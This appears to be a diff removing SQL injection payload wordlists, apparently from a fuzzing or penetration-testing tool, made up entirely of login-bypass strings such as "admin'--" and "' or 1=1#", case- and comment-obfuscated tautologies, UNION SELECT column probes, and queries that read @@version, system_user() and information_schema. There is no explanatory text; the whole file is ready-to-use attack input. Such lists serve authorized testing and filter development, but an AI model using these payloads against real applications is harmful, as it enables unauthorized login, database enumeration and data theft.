|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x'='x
|
|
||||||
" or "x"="x
|
|
||||||
' OR 'x'='x'#;
|
|
||||||
'=' 'or' and '=' 'or'
|
|
||||||
' UNION ALL SELECT 1, @@version;#
|
|
||||||
' UNION ALL SELECT system_user(),user();#
|
|
||||||
' UNION select table_schema,table_name FROM information_Schema.tables;#
|
|
||||||
admin' and substring(password/text(),1,1)='7
|
|
||||||
' and substring(password/text(),1,1)='7
|
|
||||||
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
"
|
|
||||||
'-- 2
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
"-- 2
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
'-'
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
'='
|
|
||||||
0'<'2
|
|
||||||
"-"
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
"="
|
|
||||||
0"<"2
|
|
||||||
|
|
||||||
')
|
|
||||||
")
|
|
||||||
')-- 2
|
|
||||||
')/*
|
|
||||||
')#
|
|
||||||
")-- 2
|
|
||||||
") #
|
|
||||||
")/*
|
|
||||||
')-('
|
|
||||||
')&('
|
|
||||||
')^('
|
|
||||||
')*('
|
|
||||||
')=('
|
|
||||||
0')<('2
|
|
||||||
")-("
|
|
||||||
")&("
|
|
||||||
")^("
|
|
||||||
")*("
|
|
||||||
")=("
|
|
||||||
0")<("2
|
|
||||||
|
|
||||||
'-''-- 2
|
|
||||||
'-''#
|
|
||||||
'-''/*
|
|
||||||
'&''-- 2
|
|
||||||
'&''#
|
|
||||||
'&''/*
|
|
||||||
'^''-- 2
|
|
||||||
'^''#
|
|
||||||
'^''/*
|
|
||||||
'*''-- 2
|
|
||||||
'*''#
|
|
||||||
'*''/*
|
|
||||||
'=''-- 2
|
|
||||||
'=''#
|
|
||||||
'=''/*
|
|
||||||
0'<'2'-- 2
|
|
||||||
0'<'2'#
|
|
||||||
0'<'2'/*
|
|
||||||
"-""-- 2
|
|
||||||
"-""#
|
|
||||||
"-""/*
|
|
||||||
"&""-- 2
|
|
||||||
"&""#
|
|
||||||
"&""/*
|
|
||||||
"^""-- 2
|
|
||||||
"^""#
|
|
||||||
"^""/*
|
|
||||||
"*""-- 2
|
|
||||||
"*""#
|
|
||||||
"*""/*
|
|
||||||
"=""-- 2
|
|
||||||
"=""#
|
|
||||||
"=""/*
|
|
||||||
0"<"2"-- 2
|
|
||||||
0"<"2"#
|
|
||||||
0"<"2"/*
|
|
||||||
|
|
||||||
')-''-- 2
|
|
||||||
')-''#
|
|
||||||
')-''/*
|
|
||||||
')&''-- 2
|
|
||||||
')&''#
|
|
||||||
')&''/*
|
|
||||||
')^''-- 2
|
|
||||||
')^''#
|
|
||||||
')^''/*
|
|
||||||
')*''-- 2
|
|
||||||
')*''#
|
|
||||||
')*''/*
|
|
||||||
')=''-- 2
|
|
||||||
')=''#
|
|
||||||
')=''/*
|
|
||||||
0')<'2'-- 2
|
|
||||||
0')<'2'#
|
|
||||||
0')<'2'/*
|
|
||||||
")-""-- 2
|
|
||||||
")-""#
|
|
||||||
")-""/*
|
|
||||||
")&""-- 2
|
|
||||||
")&""#
|
|
||||||
")&""/*
|
|
||||||
")^""-- 2
|
|
||||||
")^""#
|
|
||||||
")^""/*
|
|
||||||
")*""-- 2
|
|
||||||
")*""#
|
|
||||||
")*""/*
|
|
||||||
")=""-- 2
|
|
||||||
")=""#
|
|
||||||
")=""/*
|
|
||||||
0")<"2-- 2
|
|
||||||
0")<"2#
|
|
||||||
0")<"2/*
|
|
||||||
|
|
||||||
|
|
||||||
'oR'2
|
|
||||||
'oR'2'-- 2
|
|
||||||
'oR'2'#
|
|
||||||
'oR'2'/*
|
|
||||||
'oR'2'oR'
|
|
||||||
'oR(2)-- 2
|
|
||||||
'oR(2)#
|
|
||||||
'oR(2)/*
|
|
||||||
'oR(2)oR'
|
|
||||||
'oR 2-- 2
|
|
||||||
'oR 2#
|
|
||||||
'oR 2/*
|
|
||||||
'oR 2 oR'
|
|
||||||
'oR/**/2-- 2
|
|
||||||
'oR/**/2#
|
|
||||||
'oR/**/2/*
|
|
||||||
'oR/**/2/**/oR'
|
|
||||||
"oR"2
|
|
||||||
"oR"2"-- 2
|
|
||||||
"oR"2"#
|
|
||||||
"oR"2"/*
|
|
||||||
"oR"2"oR"
|
|
||||||
"oR(2)-- 2
|
|
||||||
"oR(2)#
|
|
||||||
"oR(2)/*
|
|
||||||
"oR(2)oR"
|
|
||||||
"oR 2-- 2
|
|
||||||
"oR 2#
|
|
||||||
"oR 2/*
|
|
||||||
"oR 2 oR"
|
|
||||||
"oR/**/2-- 2
|
|
||||||
"oR/**/2#
|
|
||||||
"oR/**/2/*
|
|
||||||
"oR/**/2/**/oR"
|
|
||||||
|
|
||||||
'oR'2'='2
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR'2'='2'-- 2
|
|
||||||
'oR'2'='2'#
|
|
||||||
'oR'2'='2'/*
|
|
||||||
'oR'2'='2'oR'
|
|
||||||
'oR 2=2-- 2
|
|
||||||
'oR 2=2#
|
|
||||||
'oR 2=2/*
|
|
||||||
'oR 2=2 oR'
|
|
||||||
'oR/**/2=2-- 2
|
|
||||||
'oR/**/2=2#
|
|
||||||
'oR/**/2=2/*
|
|
||||||
'oR/**/2=2/**/oR'
|
|
||||||
'oR(2)=2-- 2
|
|
||||||
'oR(2)=2#
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=2/*
|
|
||||||
'oR(2)=(2)oR'
|
|
||||||
'oR'2'='2' LimIT 1-- 2
|
|
||||||
'oR'2'='2' LimIT 1#
|
|
||||||
'oR'2'='2' LimIT 1/*
|
|
||||||
'oR(2)=(2)LimIT(1)-- 2
|
|
||||||
'oR(2)=(2)LimIT(1)#
|
|
||||||
'oR(2)=(2)LimIT(1)/*
|
|
||||||
"oR"2"="2
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR"2"="2"-- 2
|
|
||||||
"oR"2"="2"#
|
|
||||||
"oR"2"="2"/*
|
|
||||||
"oR"2"="2"oR"
|
|
||||||
"oR 2=2-- 2
|
|
||||||
"oR 2=2#
|
|
||||||
"oR 2=2/*
|
|
||||||
"oR 2=2 oR"
|
|
||||||
"oR/**/2=2-- 2
|
|
||||||
"oR/**/2=2#
|
|
||||||
"oR/**/2=2/*
|
|
||||||
"oR/**/2=2/**/oR"
|
|
||||||
"oR(2)=2-- 2
|
|
||||||
"oR(2)=2#
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=2/*
|
|
||||||
"oR(2)=(2)oR"
|
|
||||||
"oR"2"="2" LimIT 1-- 2
|
|
||||||
"oR"2"="2" LimIT 1#
|
|
||||||
"oR"2"="2" LimIT 1/*
|
|
||||||
"oR(2)=(2)LimIT(1)-- 2
|
|
||||||
"oR(2)=(2)LimIT(1)#
|
|
||||||
"oR(2)=(2)LimIT(1)/*
|
|
||||||
|
|
||||||
'oR true-- 2
|
|
||||||
'oR true#
|
|
||||||
'oR true/*
|
|
||||||
'oR true oR'
|
|
||||||
'oR(true)-- 2
|
|
||||||
'oR(true)#
|
|
||||||
'oR(true)/*
|
|
||||||
'oR(true)oR'
|
|
||||||
'oR/**/true-- 2
|
|
||||||
'oR/**/true#
|
|
||||||
'oR/**/true/*
|
|
||||||
'oR/**/true/**/oR'
|
|
||||||
"oR true-- 2
|
|
||||||
"oR true#
|
|
||||||
"oR true/*
|
|
||||||
"oR true oR"
|
|
||||||
"oR(true)-- 2
|
|
||||||
"oR(true)#
|
|
||||||
"oR(true)/*
|
|
||||||
"oR(true)oR"
|
|
||||||
"oR/**/true-- 2
|
|
||||||
"oR/**/true#
|
|
||||||
"oR/**/true/*
|
|
||||||
"oR/**/true/**/oR"
|
|
||||||
|
|
||||||
'oR'2'LiKE'2
|
|
||||||
'oR'2'LiKE'2'-- 2
|
|
||||||
'oR'2'LiKE'2'#
|
|
||||||
'oR'2'LiKE'2'/*
|
|
||||||
'oR'2'LiKE'2'oR'
|
|
||||||
'oR(2)LiKE(2)-- 2
|
|
||||||
'oR(2)LiKE(2)#
|
|
||||||
'oR(2)LiKE(2)/*
|
|
||||||
'oR(2)LiKE(2)oR'
|
|
||||||
"oR"2"LiKE"2
|
|
||||||
"oR"2"LiKE"2"-- 2
|
|
||||||
"oR"2"LiKE"2"#
|
|
||||||
"oR"2"LiKE"2"/*
|
|
||||||
"oR"2"LiKE"2"oR"
|
|
||||||
"oR(2)LiKE(2)-- 2
|
|
||||||
"oR(2)LiKE(2)#
|
|
||||||
"oR(2)LiKE(2)/*
|
|
||||||
"oR(2)LiKE(2)oR"
|
|
||||||
|
|
||||||
admin
|
|
||||||
admin'-- 2
|
|
||||||
admin'#
|
|
||||||
admin'/*
|
|
||||||
admin"-- 2
|
|
||||||
admin"#
|
|
||||||
ffifdyop
|
|
||||||
|
|
||||||
' UniON SElecT 1,2-- 2
|
|
||||||
' UniON SElecT 1,2,3-- 2
|
|
||||||
' UniON SElecT 1,2,3,4-- 2
|
|
||||||
' UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
' UniON SElecT 1,2#
|
|
||||||
' UniON SElecT 1,2,3#
|
|
||||||
' UniON SElecT 1,2,3,4#
|
|
||||||
' UniON SElecT 1,2,3,4,5#
|
|
||||||
'UniON(SElecT(1),2)-- 2
|
|
||||||
'UniON(SElecT(1),2,3)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
'UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
'UniON(SElecT(1),2)#
|
|
||||||
'UniON(SElecT(1),2,3)#
|
|
||||||
'UniON(SElecT(1),2,3,4)#
|
|
||||||
'UniON(SElecT(1),2,3,4,5)#
|
|
||||||
" UniON SElecT 1,2-- 2
|
|
||||||
" UniON SElecT 1,2,3-- 2
|
|
||||||
" UniON SElecT 1,2,3,4-- 2
|
|
||||||
" UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
" UniON SElecT 1,2#
|
|
||||||
" UniON SElecT 1,2,3#
|
|
||||||
" UniON SElecT 1,2,3,4#
|
|
||||||
" UniON SElecT 1,2,3,4,5#
|
|
||||||
"UniON(SElecT(1),2)-- 2
|
|
||||||
"UniON(SElecT(1),2,3)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
"UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
"UniON(SElecT(1),2)#
|
|
||||||
"UniON(SElecT(1),2,3)#
|
|
||||||
"UniON(SElecT(1),2,3,4)#
|
|
||||||
"UniON(SElecT(1),2,3,4,5)#
|
|
||||||
|
|
||||||
'||'2
|
|
||||||
'||2-- 2
|
|
||||||
'||'2'||'
|
|
||||||
'||2#
|
|
||||||
'||2/*
|
|
||||||
'||2||'
|
|
||||||
"||"2
|
|
||||||
"||2-- 2
|
|
||||||
"||"2"||"
|
|
||||||
"||2#
|
|
||||||
"||2/*
|
|
||||||
"||2||"
|
|
||||||
'||'2'='2
|
|
||||||
'||'2'='2'||'
|
|
||||||
'||2=2-- 2
|
|
||||||
'||2=2#
|
|
||||||
'||2=2/*
|
|
||||||
'||2=2||'
|
|
||||||
"||"2"="2
|
|
||||||
"||"2"="2"||"
|
|
||||||
"||2=2-- 2
|
|
||||||
"||2=2#
|
|
||||||
"||2=2/*
|
|
||||||
"||2=2||"
|
|
||||||
'||2=(2)LimIT(1)-- 2
|
|
||||||
'||2=(2)LimIT(1)#
|
|
||||||
'||2=(2)LimIT(1)/*
|
|
||||||
"||2=(2)LimIT(1)-- 2
|
|
||||||
"||2=(2)LimIT(1)#
|
|
||||||
"||2=(2)LimIT(1)/*
|
|
||||||
'||true-- 2
|
|
||||||
'||true#
|
|
||||||
'||true/*
|
|
||||||
'||true||'
|
|
||||||
"||true-- 2
|
|
||||||
"||true#
|
|
||||||
"||true/*
|
|
||||||
"||true||"
|
|
||||||
'||'2'LiKE'2
|
|
||||||
'||'2'LiKE'2'-- 2
|
|
||||||
'||'2'LiKE'2'#
|
|
||||||
'||'2'LiKE'2'/*
|
|
||||||
'||'2'LiKE'2'||'
|
|
||||||
'||(2)LiKE(2)-- 2
|
|
||||||
'||(2)LiKE(2)#
|
|
||||||
'||(2)LiKE(2)/*
|
|
||||||
'||(2)LiKE(2)||'
|
|
||||||
"||"2"LiKE"2
|
|
||||||
"||"2"LiKE"2"-- 2
|
|
||||||
"||"2"LiKE"2"#
|
|
||||||
"||"2"LiKE"2"/*
|
|
||||||
"||"2"LiKE"2"||"
|
|
||||||
"||(2)LiKE(2)-- 2
|
|
||||||
"||(2)LiKE(2)#
|
|
||||||
"||(2)LiKE(2)/*
|
|
||||||
"||(2)LiKE(2)||"
|
|
||||||
|
|
||||||
')oR('2
|
|
||||||
')oR'2'-- 2
|
|
||||||
')oR'2'#
|
|
||||||
')oR'2'/*
|
|
||||||
')oR'2'oR('
|
|
||||||
')oR(2)-- 2
|
|
||||||
')oR(2)#
|
|
||||||
')oR(2)/*
|
|
||||||
')oR(2)oR('
|
|
||||||
')oR 2-- 2
|
|
||||||
')oR 2#
|
|
||||||
')oR 2/*
|
|
||||||
')oR 2 oR('
|
|
||||||
')oR/**/2-- 2
|
|
||||||
')oR/**/2#
|
|
||||||
')oR/**/2/*
|
|
||||||
')oR/**/2/**/oR('
|
|
||||||
")oR("2
|
|
||||||
")oR"2"-- 2
|
|
||||||
")oR"2"#
|
|
||||||
")oR"2"/*
|
|
||||||
")oR"2"oR("
|
|
||||||
")oR(2)-- 2
|
|
||||||
")oR(2)#
|
|
||||||
")oR(2)/*
|
|
||||||
")oR(2)oR("
|
|
||||||
")oR 2-- 2
|
|
||||||
")oR 2#
|
|
||||||
")oR 2/*
|
|
||||||
")oR 2 oR("
|
|
||||||
")oR/**/2-- 2
|
|
||||||
")oR/**/2#
|
|
||||||
")oR/**/2/*
|
|
||||||
")oR/**/2/**/oR("
|
|
||||||
')oR'2'=('2
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR'2'='2'-- 2
|
|
||||||
')oR'2'='2'#
|
|
||||||
')oR'2'='2'/*
|
|
||||||
')oR'2'='2'oR('
|
|
||||||
')oR 2=2-- 2
|
|
||||||
')oR 2=2#
|
|
||||||
')oR 2=2/*
|
|
||||||
')oR 2=2 oR('
|
|
||||||
')oR/**/2=2-- 2
|
|
||||||
')oR/**/2=2#
|
|
||||||
')oR/**/2=2/*
|
|
||||||
')oR/**/2=2/**/oR('
|
|
||||||
')oR(2)=2-- 2
|
|
||||||
')oR(2)=2#
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=2/*
|
|
||||||
')oR(2)=(2)oR('
|
|
||||||
')oR'2'='2' LimIT 1-- 2
|
|
||||||
')oR'2'='2' LimIT 1#
|
|
||||||
')oR'2'='2' LimIT 1/*
|
|
||||||
')oR(2)=(2)LimIT(1)-- 2
|
|
||||||
')oR(2)=(2)LimIT(1)#
|
|
||||||
')oR(2)=(2)LimIT(1)/*
|
|
||||||
")oR"2"=("2
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR"2"="2"-- 2
|
|
||||||
")oR"2"="2"#
|
|
||||||
")oR"2"="2"/*
|
|
||||||
")oR"2"="2"oR("
|
|
||||||
")oR 2=2-- 2
|
|
||||||
")oR 2=2#
|
|
||||||
")oR 2=2/*
|
|
||||||
")oR 2=2 oR("
|
|
||||||
")oR/**/2=2-- 2
|
|
||||||
")oR/**/2=2#
|
|
||||||
")oR/**/2=2/*
|
|
||||||
")oR/**/2=2/**/oR("
|
|
||||||
")oR(2)=2-- 2
|
|
||||||
")oR(2)=2#
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=2/*
|
|
||||||
")oR(2)=(2)oR("
|
|
||||||
")oR"2"="2" LimIT 1-- 2
|
|
||||||
")oR"2"="2" LimIT 1#
|
|
||||||
")oR"2"="2" LimIT 1/*
|
|
||||||
")oR(2)=(2)LimIT(1)-- 2
|
|
||||||
")oR(2)=(2)LimIT(1)#
|
|
||||||
")oR(2)=(2)LimIT(1)/*
|
|
||||||
')oR true-- 2
|
|
||||||
')oR true#
|
|
||||||
')oR true/*
|
|
||||||
')oR true oR('
|
|
||||||
')oR(true)-- 2
|
|
||||||
')oR(true)#
|
|
||||||
')oR(true)/*
|
|
||||||
')oR(true)oR('
|
|
||||||
')oR/**/true-- 2
|
|
||||||
')oR/**/true#
|
|
||||||
')oR/**/true/*
|
|
||||||
')oR/**/true/**/oR('
|
|
||||||
")oR true-- 2
|
|
||||||
")oR true#
|
|
||||||
")oR true/*
|
|
||||||
")oR true oR("
|
|
||||||
")oR(true)-- 2
|
|
||||||
")oR(true)#
|
|
||||||
")oR(true)/*
|
|
||||||
")oR(true)oR("
|
|
||||||
")oR/**/true-- 2
|
|
||||||
")oR/**/true#
|
|
||||||
")oR/**/true/*
|
|
||||||
")oR/**/true/**/oR("
|
|
||||||
')oR'2'LiKE('2
|
|
||||||
')oR'2'LiKE'2'-- 2
|
|
||||||
')oR'2'LiKE'2'#
|
|
||||||
')oR'2'LiKE'2'/*
|
|
||||||
')oR'2'LiKE'2'oR('
|
|
||||||
')oR(2)LiKE(2)-- 2
|
|
||||||
')oR(2)LiKE(2)#
|
|
||||||
')oR(2)LiKE(2)/*
|
|
||||||
')oR(2)LiKE(2)oR('
|
|
||||||
")oR"2"LiKE("2
|
|
||||||
")oR"2"LiKE"2"-- 2
|
|
||||||
")oR"2"LiKE"2"#
|
|
||||||
")oR"2"LiKE"2"/*
|
|
||||||
")oR"2"LiKE"2"oR("
|
|
||||||
")oR(2)LiKE(2)-- 2
|
|
||||||
")oR(2)LiKE(2)#
|
|
||||||
")oR(2)LiKE(2)/*
|
|
||||||
")oR(2)LiKE(2)oR("
|
|
||||||
admin')-- 2
|
|
||||||
admin')#
|
|
||||||
admin')/*
|
|
||||||
admin")-- 2
|
|
||||||
admin")#
|
|
||||||
') UniON SElecT 1,2-- 2
|
|
||||||
') UniON SElecT 1,2,3-- 2
|
|
||||||
') UniON SElecT 1,2,3,4-- 2
|
|
||||||
') UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
') UniON SElecT 1,2#
|
|
||||||
') UniON SElecT 1,2,3#
|
|
||||||
') UniON SElecT 1,2,3,4#
|
|
||||||
') UniON SElecT 1,2,3,4,5#
|
|
||||||
')UniON(SElecT(1),2)-- 2
|
|
||||||
')UniON(SElecT(1),2,3)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
')UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
')UniON(SElecT(1),2)#
|
|
||||||
')UniON(SElecT(1),2,3)#
|
|
||||||
')UniON(SElecT(1),2,3,4)#
|
|
||||||
')UniON(SElecT(1),2,3,4,5)#
|
|
||||||
") UniON SElecT 1,2-- 2
|
|
||||||
") UniON SElecT 1,2,3-- 2
|
|
||||||
") UniON SElecT 1,2,3,4-- 2
|
|
||||||
") UniON SElecT 1,2,3,4,5-- 2
|
|
||||||
") UniON SElecT 1,2#
|
|
||||||
") UniON SElecT 1,2,3#
|
|
||||||
") UniON SElecT 1,2,3,4#
|
|
||||||
") UniON SElecT 1,2,3,4,5#
|
|
||||||
")UniON(SElecT(1),2)-- 2
|
|
||||||
")UniON(SElecT(1),2,3)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4)-- 2
|
|
||||||
")UniON(SElecT(1),2,3,4,5)-- 2
|
|
||||||
")UniON(SElecT(1),2)#
|
|
||||||
")UniON(SElecT(1),2,3)#
|
|
||||||
")UniON(SElecT(1),2,3,4)#
|
|
||||||
")UniON(SElecT(1),2,3,4,5)#
|
|
||||||
')||('2
|
|
||||||
')||2-- 2
|
|
||||||
')||'2'||('
|
|
||||||
')||2#
|
|
||||||
')||2/*
|
|
||||||
')||2||('
|
|
||||||
")||("2
|
|
||||||
")||2-- 2
|
|
||||||
")||"2"||("
|
|
||||||
")||2#
|
|
||||||
")||2/*
|
|
||||||
")||2||("
|
|
||||||
')||'2'=('2
|
|
||||||
')||'2'='2'||('
|
|
||||||
')||2=2-- 2
|
|
||||||
')||2=2#
|
|
||||||
')||2=2/*
|
|
||||||
')||2=2||('
|
|
||||||
")||"2"=("2
|
|
||||||
")||"2"="2"||("
|
|
||||||
")||2=2-- 2
|
|
||||||
")||2=2#
|
|
||||||
")||2=2/*
|
|
||||||
")||2=2||("
|
|
||||||
')||2=(2)LimIT(1)-- 2
|
|
||||||
')||2=(2)LimIT(1)#
|
|
||||||
')||2=(2)LimIT(1)/*
|
|
||||||
")||2=(2)LimIT(1)-- 2
|
|
||||||
")||2=(2)LimIT(1)#
|
|
||||||
")||2=(2)LimIT(1)/*
|
|
||||||
')||true-- 2
|
|
||||||
')||true#
|
|
||||||
')||true/*
|
|
||||||
')||true||('
|
|
||||||
")||true-- 2
|
|
||||||
")||true#
|
|
||||||
")||true/*
|
|
||||||
")||true||("
|
|
||||||
')||'2'LiKE('2
|
|
||||||
')||'2'LiKE'2'-- 2
|
|
||||||
')||'2'LiKE'2'#
|
|
||||||
')||'2'LiKE'2'/*
|
|
||||||
')||'2'LiKE'2'||('
|
|
||||||
')||(2)LiKE(2)-- 2
|
|
||||||
')||(2)LiKE(2)#
|
|
||||||
')||(2)LiKE(2)/*
|
|
||||||
')||(2)LiKE(2)||('
|
|
||||||
")||"2"LiKE("2
|
|
||||||
")||"2"LiKE"2"-- 2
|
|
||||||
")||"2"LiKE"2"#
|
|
||||||
")||"2"LiKE"2"/*
|
|
||||||
")||"2"LiKE"2"||("
|
|
||||||
")||(2)LiKE(2)-- 2
|
|
||||||
")||(2)LiKE(2)#
|
|
||||||
")||(2)LiKE(2)/*
|
|
||||||
")||(2)LiKE(2)||("
|
|
||||||
' UnION SELeCT 1,2`
|
|
||||||
' UnION SELeCT 1,2,3`
|
|
||||||
' UnION SELeCT 1,2,3,4`
|
|
||||||
' UnION SELeCT 1,2,3,4,5`
|
|
||||||
" UnION SELeCT 1,2`
|
|
||||||
" UnION SELeCT 1,2,3`
|
|
||||||
" UnION SELeCT 1,2,3,4`
|
|
||||||
" UnION SELeCT 1,2,3,4,5`
|
|
||||||
@ -1,771 +0,0 @@
|
|||||||
'-'
|
|
||||||
' '
|
|
||||||
'&'
|
|
||||||
'^'
|
|
||||||
'*'
|
|
||||||
' or ''-'
|
|
||||||
' or '' '
|
|
||||||
' or ''&'
|
|
||||||
' or ''^'
|
|
||||||
' or ''*'
|
|
||||||
"-"
|
|
||||||
" "
|
|
||||||
"&"
|
|
||||||
"^"
|
|
||||||
"*"
|
|
||||||
" or ""-"
|
|
||||||
" or "" "
|
|
||||||
" or ""&"
|
|
||||||
" or ""^"
|
|
||||||
" or ""*"
|
|
||||||
or true--
|
|
||||||
" or true--
|
|
||||||
' or true--
|
|
||||||
") or true--
|
|
||||||
') or true--
|
|
||||||
' or 'x'='x
|
|
||||||
') or ('x')=('x
|
|
||||||
')) or (('x'))=(('x
|
|
||||||
" or "x"="x
|
|
||||||
") or ("x")=("x
|
|
||||||
")) or (("x"))=(("x
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1#
|
|
||||||
or 1=1/*
|
|
||||||
admin' --
|
|
||||||
admin' #
|
|
||||||
admin'/*
|
|
||||||
admin' or '1'='1
|
|
||||||
admin' or '1'='1'--
|
|
||||||
admin' or '1'='1'#
|
|
||||||
admin' or '1'='1'/*
|
|
||||||
admin'or 1=1 or ''='
|
|
||||||
admin' or 1=1
|
|
||||||
admin' or 1=1--
|
|
||||||
admin' or 1=1#
|
|
||||||
admin' or 1=1/*
|
|
||||||
admin') or ('1'='1
|
|
||||||
admin') or ('1'='1'--
|
|
||||||
admin') or ('1'='1'#
|
|
||||||
admin') or ('1'='1'/*
|
|
||||||
admin') or '1'='1
|
|
||||||
admin') or '1'='1'--
|
|
||||||
admin') or '1'='1'#
|
|
||||||
admin') or '1'='1'/*
|
|
||||||
1234 ' AND 1=0 UNION ALL SELECT 'admin', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
admin" --
|
|
||||||
admin" #
|
|
||||||
admin"/*
|
|
||||||
admin" or "1"="1
|
|
||||||
admin" or "1"="1"--
|
|
||||||
admin" or "1"="1"#
|
|
||||||
admin" or "1"="1"/*
|
|
||||||
admin"or 1=1 or ""="
|
|
||||||
admin" or 1=1
|
|
||||||
admin" or 1=1--
|
|
||||||
admin" or 1=1#
|
|
||||||
admin" or 1=1/*
|
|
||||||
admin") or ("1"="1
|
|
||||||
admin") or ("1"="1"--
|
|
||||||
admin") or ("1"="1"#
|
|
||||||
admin") or ("1"="1"/*
|
|
||||||
admin") or "1"="1
|
|
||||||
admin") or "1"="1"--
|
|
||||||
admin") or "1"="1"#
|
|
||||||
admin") or "1"="1"/*
|
|
||||||
1234 " AND 1=0 UNION ALL SELECT "admin", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
==
|
|
||||||
=
|
|
||||||
'
|
|
||||||
' --
|
|
||||||
' #
|
|
||||||
' –
|
|
||||||
'--
|
|
||||||
'/*
|
|
||||||
'#
|
|
||||||
" --
|
|
||||||
" #
|
|
||||||
"/*
|
|
||||||
' and 1='1
|
|
||||||
' and a='a
|
|
||||||
or 1=1
|
|
||||||
or true
|
|
||||||
' or ''='
|
|
||||||
" or ""="
|
|
||||||
1′) and '1′='1–
|
|
||||||
' AND 1=0 UNION ALL SELECT '', '81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
" AND 1=0 UNION ALL SELECT "", "81dc9bdb52d04dc20036dbd8313ed055
|
|
||||||
and 1=1
|
|
||||||
and 1=1–
|
|
||||||
' and 'one'='one
|
|
||||||
' and 'one'='one–
|
|
||||||
' group by password having 1=1--
|
|
||||||
' group by userid having 1=1--
|
|
||||||
' group by username having 1=1--
|
|
||||||
like '%'
|
|
||||||
or 0=0 --
|
|
||||||
or 0=0 #
|
|
||||||
or 0=0 –
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 --
|
|
||||||
' or 0=0 #
|
|
||||||
' or 0=0 –
|
|
||||||
" or 0=0 --
|
|
||||||
" or 0=0 #
|
|
||||||
" or 0=0 –
|
|
||||||
%' or '0'='0
|
|
||||||
or 1=1
|
|
||||||
or 1=1--
|
|
||||||
or 1=1/*
|
|
||||||
or 1=1#
|
|
||||||
or 1=1–
|
|
||||||
' or 1=1--
|
|
||||||
' or '1'='1
|
|
||||||
' or '1'='1'--
|
|
||||||
' or '1'='1'/*
|
|
||||||
' or '1'='1'#
|
|
||||||
' or '1′='1
|
|
||||||
' or 1=1
|
|
||||||
' or 1=1 --
|
|
||||||
' or 1=1 –
|
|
||||||
' or 1=1--
|
|
||||||
' or 1=1;#
|
|
||||||
' or 1=1/*
|
|
||||||
' or 1=1#
|
|
||||||
' or 1=1–
|
|
||||||
') or '1'='1
|
|
||||||
') or '1'='1--
|
|
||||||
') or '1'='1'--
|
|
||||||
') or '1'='1'/*
|
|
||||||
') or '1'='1'#
|
|
||||||
') or ('1'='1
|
|
||||||
') or ('1'='1--
|
|
||||||
') or ('1'='1'--
|
|
||||||
') or ('1'='1'/*
|
|
||||||
') or ('1'='1'#
|
|
||||||
'or'1=1
|
|
||||||
'or'1=1′
|
|
||||||
" or "1"="1
|
|
||||||
" or "1"="1"--
|
|
||||||
" or "1"="1"/*
|
|
||||||
" or "1"="1"#
|
|
||||||
" or 1=1
|
|
||||||
" or 1=1 --
|
|
||||||
" or 1=1 –
|
|
||||||
" or 1=1--
|
|
||||||
" or 1=1/*
|
|
||||||
" or 1=1#
|
|
||||||
" or 1=1–
|
|
||||||
") or "1"="1
|
|
||||||
") or "1"="1"--
|
|
||||||
") or "1"="1"/*
|
|
||||||
") or "1"="1"#
|
|
||||||
") or ("1"="1
|
|
||||||
") or ("1"="1"--
|
|
||||||
") or ("1"="1"/*
|
|
||||||
") or ("1"="1"#
|
|
||||||
) or '1′='1–
|
|
||||||
) or ('1′='1–
|
|
||||||
' or 1=1 LIMIT 1;#
|
|
||||||
'or 1=1 or ''='
|
|
||||||
"or 1=1 or ""="
|
|
||||||
' or 'a'='a
|
|
||||||
' or a=a--
|
|
||||||
' or a=a–
|
|
||||||
') or ('a'='a
|
|
||||||
" or "a"="a
|
|
||||||
") or ("a"="a
|
|
||||||
') or ('a'='a and hi") or ("a"="a
|
|
||||||
' or 'one'='one
|
|
||||||
' or 'one'='one–
|
|
||||||
' or uid like '%
|
|
||||||
' or uname like '%
|
|
||||||
' or userid like '%
|
|
||||||
' or user like '%
|
|
||||||
' or username like '%
|
|
||||||
' or 'x'='x
|
|
||||||
